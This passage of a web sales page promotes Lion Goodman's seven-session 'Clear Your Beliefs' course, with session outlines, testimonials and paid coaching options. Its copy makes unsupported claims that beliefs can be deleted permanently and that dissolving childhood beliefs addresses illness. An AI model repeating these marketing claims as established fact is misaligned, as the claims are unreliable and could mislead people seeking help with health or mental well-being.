<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to 